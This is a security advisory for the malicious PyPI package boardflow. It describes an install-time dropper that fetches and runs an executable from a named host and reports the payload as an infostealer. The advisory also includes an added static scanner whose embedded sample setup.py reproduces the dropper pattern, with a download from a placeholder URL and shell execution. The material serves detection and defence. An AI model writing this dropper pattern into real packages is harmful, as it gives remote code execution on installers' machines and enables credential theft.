Malicious package

boardflow (PyPI)

Malicious code in boardflow (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-6080
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall boardflow

What this malware does

On pip install boardflow, setup.py spawns a background thread that fetches http://pooron.org/test.exe over plain HTTP into the OS temp directory and executes it via subprocess.Popen with shell=True, suppressing stdout/stderr. The destination domain is unrelated to the package's advertised purpose (a CLI Kanban tool). The URL is unpinned and unverified: there is no hash and no signature, and plain HTTP allows MITM tampering. The fetched .exe is attacker-controlled content executed with the privileges of the installing user. This is a classic install-time dropper that yields arbitrary remote code execution on every installer's machine.

During installation, the package downloads and executes a remote executable identified as an infostealer. The executable contains a VSCode extension with a modified code variant that, during initialization, downloads and executes a JS script from a hardcoded location. During analysis, the script was inaccessible.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-boardflow

Reasons (based on the campaign):

  • infostealer

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • Downloads and executes a remote executable.

  • malware
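
The traits listed above (install command override in setup.py, background thread, plain-HTTP fetch, shell execution) can be checked statically before anything is installed. The following is an added example, not code from this advisory or its reporters; the function name scan_setup_py, the finding labels and the sample string (with a placeholder URL) are constructed for illustration.

```python
import ast

# Constructed sample for illustration only; it is parsed, never executed.
SAMPLE_SETUP = '''
import subprocess, tempfile, threading, urllib.request
from setuptools import setup
from setuptools.command.install import install
def _fetch():
    dest = tempfile.gettempdir() + "/x.bin"
    urllib.request.urlretrieve("http://example.invalid/x.bin", dest)
    subprocess.Popen(dest, shell=True)
class CustomInstall(install):
    def run(self):
        threading.Thread(target=_fetch).start()
        install.run(self)
setup(name="demo", cmdclass={"install": CustomInstall})
'''

def scan_setup_py(source):
    """Return sorted labels for install-time dropper traits found in source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = ast.unparse(node.func)  # dotted call name (Python 3.9+)
            kw = {k.arg: k.value for k in node.keywords if k.arg}
            # setup(cmdclass={"install": ...}) replaces the install command
            if name.endswith("setup") and isinstance(kw.get("cmdclass"), ast.Dict):
                keys = [k.value for k in kw["cmdclass"].keys
                        if isinstance(k, ast.Constant)]
                if "install" in keys:
                    findings.add("install-command-override")
            # subprocess.* with shell=True, or os.system
            shell = kw.get("shell")
            if name == "os.system" or (name.startswith("subprocess.")
                    and isinstance(shell, ast.Constant) and shell.value is True):
                findings.add("shell-execution")
            if name.split(".")[-1] in {"urlretrieve", "urlopen"} \
                    or name.startswith("requests."):
                findings.add("network-fetch")
            if name == "threading.Thread":
                findings.add("background-thread")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith("http://"):
                findings.add("plain-http-url")
    return sorted(findings)

if __name__ == "__main__":
    print(scan_setup_py(SAMPLE_SETUP))
```

Run it against the setup.py extracted from an sdist (without installing it); any single finding is only a signal, while the combination of an install override with fetch and execution matches the behaviour described here.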

Malicious versions

2 flagged
1.0.0, 1.0.1

Indicators of compromise (SHA-256)

7a7f48df7609edb5bab9d9e572f093994d071165578a58032a69392d62b08b86
1ca250ab62e505dc679b9930d0ea3259c0e1bad68eee5690f9d434d1a8f1077e

Frequently asked questions

No. boardflow on PyPI has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006940 · 2026-06-boardflow

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter

boardflow (PyPI) malicious package — MAL-2026-6080 | O3 Security